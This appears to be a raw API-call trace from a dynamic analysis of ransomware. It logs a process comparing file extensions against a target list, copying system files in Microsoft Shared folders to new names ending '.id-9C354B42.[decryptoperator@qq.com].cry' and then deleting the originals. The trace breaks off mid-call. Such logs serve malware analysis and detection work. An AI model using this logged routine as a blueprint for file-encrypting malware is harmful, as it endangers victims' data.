[0051.958] lstrlenW (lpString=".dbf") returned 4 [0051.958] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1 [0051.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.958] lstrlenW (lpString=".1cd") returned 4 [0051.958] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1 [0051.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.958] lstrlenW (lpString=".jpg") returned 4 [0051.958] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1 [0051.959] lstrcmpiW (lpString1=".FLT", lpString2=".cry") returned 1 [0051.959] lstrlenW (lpString="EPSIMP32.FLT") returned 12 [0051.959] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0051.959] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=712592) returned 1 [0051.959] CloseHandle (hObject=0x204) returned 1 [0051.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt")) returned 0x20 [0051.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.959] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0051.959] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.959] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.959] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0051.960] GetLastError () returned 0x0 [0051.960] ReadFile (in: hFile=0x204, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0xadf90, lpOverlapped=0x0) returned 1 [0052.272] WriteFile (in: hFile=0x220, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xadfa0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xadfa0, lpOverlapped=0x0) returned 1 [0052.282] ReadFile (in: hFile=0x204, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.282] WriteFile (in: hFile=0x220, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.282] SetEndOfFile (hFile=0x220) returned 1 [0052.401] CloseHandle (hObject=0x220) returned 1 [0052.402] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.402] SetEndOfFile (hFile=0x204) returned 1 [0052.420] CloseHandle (hObject=0x204) returned 1 [0052.420] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.421] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt")) returned 1 [0052.421] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0052.421] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0052.421] lstrlenW (lpString=".doc") returned 4 [0052.421] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0052.421] lstrlenW (lpString=".docx") returned 5 [0052.421] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0052.421] lstrlenW (lpString=".pdf") returned 4 [0052.421] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0052.421] lstrlenW (lpString=".xls") returned 4 [0052.421] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0052.421] lstrlenW (lpString=".xlsx") returned 5 [0052.422] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0052.422] lstrlenW (lpString=".ppt") returned 4 [0052.422] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0052.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0052.422] lstrlenW (lpString=".zip") returned 4 [0052.422] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0052.422] lstrlenW (lpString=".rar") returned 4 [0052.422] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0052.422] lstrlenW (lpString=".bz2") returned 4 [0052.422] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0052.422] lstrlenW (lpString=".7z") returned 3 [0052.422] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0052.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0052.422] lstrlenW (lpString=".dbf") returned 4 [0052.422] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0052.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0052.422] lstrlenW (lpString=".1cd") returned 4 [0052.422] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0052.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0052.422] lstrlenW (lpString=".jpg") returned 4 [0052.422] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0052.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0052.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0052.422] lstrlenW (lpString=".doc") returned 4 [0052.422] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0052.422] lstrlenW (lpString=".docx") returned 5 [0052.422] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0052.422] lstrlenW (lpString=".pdf") returned 4 [0052.422] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0052.422] lstrlenW (lpString=".xls") returned 4 [0052.422] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0052.422] lstrlenW (lpString=".xlsx") returned 5 [0052.423] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0052.423] lstrlenW (lpString=".ppt") returned 4 [0052.423] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0052.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0052.423] lstrlenW (lpString=".zip") returned 4 [0052.423] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0052.423] lstrlenW (lpString=".rar") returned 4 [0052.423] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0052.423] lstrlenW (lpString=".bz2") returned 4 [0052.423] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0052.423] lstrlenW (lpString=".7z") returned 3 [0052.423] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0052.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0052.423] lstrlenW (lpString=".dbf") returned 4 [0052.423] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0052.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0052.423] lstrlenW (lpString=".1cd") returned 4 [0052.423] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0052.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0052.423] lstrlenW (lpString=".jpg") returned 4 [0052.423] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0052.423] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0052.423] lstrlenW (lpString="msitss55.dll") returned 12 [0052.423] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0052.445] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=430080) returned 1 [0052.445] CloseHandle (hObject=0x1f0) returned 1 [0052.445] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll")) returned 0x20 [0052.445] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.445] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0052.445] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.445] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.445] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0052.492] GetLastError () returned 0x0 [0052.492] ReadFile (in: hFile=0x1f0, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x69000, lpOverlapped=0x0) returned 1 [0052.589] WriteFile (in: hFile=0x194, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0x69010, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x69010, lpOverlapped=0x0) returned 1 [0052.827] ReadFile (in: hFile=0x1f0, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.827] WriteFile (in: hFile=0x194, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.828] SetEndOfFile (hFile=0x194) returned 1 [0052.828] CloseHandle (hObject=0x194) returned 1 [0052.828] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.828] SetEndOfFile (hFile=0x1f0) returned 1 [0052.832] CloseHandle (hObject=0x1f0) returned 1 [0052.832] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.832] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll")) returned 1 [0052.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0052.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0052.832] lstrlenW (lpString=".doc") returned 4 [0052.832] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.832] lstrlenW (lpString=".docx") returned 5 [0052.832] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0052.832] lstrlenW (lpString=".pdf") returned 4 [0052.832] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.832] lstrlenW (lpString=".xls") returned 4 [0052.832] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.832] lstrlenW (lpString=".xlsx") returned 5 [0052.832] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0052.832] lstrlenW (lpString=".ppt") returned 4 [0052.832] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0052.832] lstrlenW (lpString=".zip") returned 4 [0052.832] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.832] lstrlenW (lpString=".rar") returned 4 [0052.833] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.833] lstrlenW (lpString=".bz2") returned 4 [0052.833] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.833] lstrlenW (lpString=".7z") returned 3 [0052.833] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0052.833] lstrlenW (lpString=".dbf") returned 4 [0052.833] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0052.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0052.833] lstrlenW (lpString=".1cd") returned 4 [0052.833] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0052.833] lstrlenW (lpString=".jpg") returned 4 [0052.833] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0052.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0052.833] lstrlenW (lpString=".doc") returned 4 [0052.833] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.833] lstrlenW (lpString=".docx") returned 5 [0052.833] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0052.833] lstrlenW (lpString=".pdf") returned 4 [0052.833] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.833] lstrlenW (lpString=".xls") returned 4 [0052.833] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.833] lstrlenW (lpString=".xlsx") returned 5 [0052.833] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0052.833] lstrlenW (lpString=".ppt") returned 4 [0052.833] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0052.833] lstrlenW (lpString=".zip") returned 4 [0052.833] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.833] lstrlenW (lpString=".rar") returned 4 [0052.833] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.833] lstrlenW (lpString=".bz2") returned 4 [0052.833] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.833] lstrlenW (lpString=".7z") returned 3 [0052.833] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0052.834] lstrlenW (lpString=".dbf") returned 4 [0052.834] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0052.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0052.834] lstrlenW (lpString=".1cd") returned 4 [0052.834] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0052.834] lstrlenW (lpString=".jpg") returned 4 [0052.834] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.834] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0052.834] lstrlenW (lpString="InkWatson.exe.mui") returned 17 [0052.834] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0052.958] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=9216) returned 1 [0052.958] CloseHandle (hObject=0x1bc) returned 1 [0052.958] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui")) returned 0x20 [0052.958] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.958] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0052.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0052.958] lstrlenW (lpString=".doc") returned 4 [0052.959] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.959] lstrlenW (lpString=".docx") returned 5 [0052.959] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0052.959] lstrlenW (lpString=".pdf") returned 4 [0052.959] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.959] lstrlenW (lpString=".xls") returned 4 [0052.959] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.959] lstrlenW (lpString=".xlsx") returned 5 [0052.959] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0052.959] lstrlenW (lpString=".ppt") returned 4 [0052.959] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0052.959] lstrlenW (lpString=".zip") returned 4 [0052.959] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.959] lstrlenW (lpString=".rar") returned 4 [0052.959] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.959] lstrlenW (lpString=".bz2") returned 4 [0052.959] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.959] lstrlenW (lpString=".7z") returned 3 [0052.959] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0052.959] lstrlenW (lpString=".dbf") returned 4 [0052.959] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0052.959] lstrlenW (lpString=".1cd") returned 4 [0052.959] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0052.959] lstrlenW (lpString=".jpg") returned 4 [0052.959] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0052.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0052.959] lstrlenW (lpString=".doc") returned 4 [0052.959] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.959] lstrlenW (lpString=".docx") returned 5 [0052.959] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0052.959] lstrlenW (lpString=".pdf") returned 4 [0052.960] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.960] lstrlenW (lpString=".xls") returned 4 [0052.960] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.960] lstrlenW (lpString=".xlsx") returned 5 [0052.960] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0052.960] lstrlenW (lpString=".ppt") returned 4 [0052.960] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0052.960] lstrlenW (lpString=".zip") returned 4 [0052.960] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.960] lstrlenW (lpString=".rar") returned 4 [0052.960] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.960] lstrlenW (lpString=".bz2") returned 4 [0052.960] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.960] lstrlenW (lpString=".7z") returned 3 [0052.960] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0052.960] lstrlenW (lpString=".dbf") returned 4 [0052.960] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0052.960] lstrlenW (lpString=".1cd") returned 4 [0052.960] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 74 [0052.960] lstrlenW (lpString=".jpg") returned 4 [0052.960] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.960] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0052.960] lstrlenW (lpString="IPSEventLogMsg.dll.mui") returned 22 [0052.960] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0052.961] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=22528) returned 1 [0052.961] CloseHandle (hObject=0x1bc) returned 1 [0052.961] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui")) returned 0x20 [0052.961] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.961] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.961] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0052.961] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0052.961] lstrlenW (lpString=".doc") returned 4 [0052.961] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.961] lstrlenW (lpString=".docx") returned 5 [0052.961] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.961] lstrlenW (lpString=".pdf") returned 4 [0052.961] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.961] lstrlenW (lpString=".xls") returned 4 [0052.961] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.961] lstrlenW (lpString=".xlsx") returned 5 [0052.961] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.961] lstrlenW (lpString=".ppt") returned 4 [0052.961] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.961] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0052.961] lstrlenW (lpString=".zip") returned 4 [0052.961] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.961] lstrlenW (lpString=".rar") returned 4 [0052.961] lstrcmpiW 